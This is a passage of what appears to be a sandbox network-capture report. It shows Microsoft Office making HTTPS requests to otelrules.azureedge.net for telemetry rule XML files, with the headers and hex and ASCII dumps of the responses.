Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session IDSource IPSource PortDestination IPDestination Port
131192.168.2.44988613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:56 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:56 GMT
Content-Type: text/xml
Content-Length: 1370
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE62E0AB"
x-ms-request-id: 135a34dd-b01e-0098-371c-27cead000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024656Z-r197bdfb6b42rt68rzg9338g1g00000008mg00000000fyh0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:56 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


Session IDSource IPSource PortDestination IPDestination Port
132192.168.2.44988713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:56 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:56 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:56 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE156D2EE"
x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024656Z-16849878b78km6fmmkbenhx76n00000006pg00000000r2s0
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:56 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


Session IDSource IPSource PortDestination IPDestination Port
133192.168.2.44988813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:56 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:56 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
ETag: "0x8DC582BEDC8193E"
x-ms-request-id: 38943712-901e-002a-666e-2a7a27000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024656Z-r197bdfb6b4gx6v9pg74w9f47s00000009e000000000e3v9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:56 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
134192.168.2.44988913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:56 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:56 GMT
Content-Type: text/xml
Content-Length: 1406
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB16F27E"
x-ms-request-id: 6a8dfae7-001e-000b-0c81-2915a7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024656Z-17c5cb586f66g7mvgrudxte95400000002bg00000000br63
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:56 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session IDSource IPSource PortDestination IPDestination Port
135192.168.2.44989013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:56 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:56 GMT
Content-Type: text/xml
Content-Length: 1369
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
ETag: "0x8DC582BE32FE1A2"
x-ms-request-id: 440f6722-a01e-0084-3501-299ccd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024656Z-17c5cb586f6wmhkn5q6fu8c5ss00000006ug000000007vky
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:57 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


Session IDSource IPSource PortDestination IPDestination Port
136192.168.2.44989113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:57 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:57 GMT
Content-Type: text/xml
Content-Length: 1414
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE03B051D"
x-ms-request-id: 0be98d05-201e-0085-5325-2934e3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024657Z-15b8d89586fmhkw429ba5n22m800000008x0000000007ckh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:57 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
137192.168.2.44989313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:57 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:57 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE54CA33F"
x-ms-request-id: eab3762f-c01e-0014-292f-28a6a3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024657Z-r197bdfb6b46krmwag4tzr9x7c00000007b0000000003fsg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:57 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
138192.168.2.44989413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:57 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:57 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:57 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0A2434F"
x-ms-request-id: 3452001d-001e-0065-12df-250b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024657Z-16849878b78zqkvcwgr6h55x9n00000006xg0000000062d9
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:57 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


Session IDSource IPSource PortDestination IPDestination Port
139192.168.2.44989213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:57 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:57 GMT
Content-Type: text/xml
Content-Length: 1377
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
ETag: "0x8DC582BEAFF0125"
x-ms-request-id: ef1abc9b-501e-0029-5887-28d0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024657Z-15b8d89586fnsf5zkvx8tfb0zc00000002k00000000087cq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:57 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


Session IDSource IPSource PortDestination IPDestination Port
140192.168.2.44989513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:57 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:57 GMT
Content-Type: text/xml
Content-Length: 1409
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFC438CF"
x-ms-request-id: 3a84bf68-701e-0053-4f6d-293a0a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024657Z-r197bdfb6b4hsj5bywyqk9r2xw00000008xg000000006uua
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:57 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


Session IDSource IPSource PortDestination IPDestination Port
141192.168.2.44989613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:58 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:58 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:58 GMT
Content-Type: text/xml
Content-Length: 1372
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE6669CA7"
x-ms-request-id: 8e66950d-f01e-0003-769c-274453000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024658Z-16849878b78fkwcjkpn19c5dsn00000006e000000000c8ke
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:58 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


Session IDSource IPSource PortDestination IPDestination Port
142192.168.2.44989813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:58 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:58 GMT
Content-Type: text/xml
Content-Length: 1371
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
ETag: "0x8DC582BED3D048D"
x-ms-request-id: b018d53a-601e-0050-79af-272c9c000000
x-ms-version: 2018-03-28
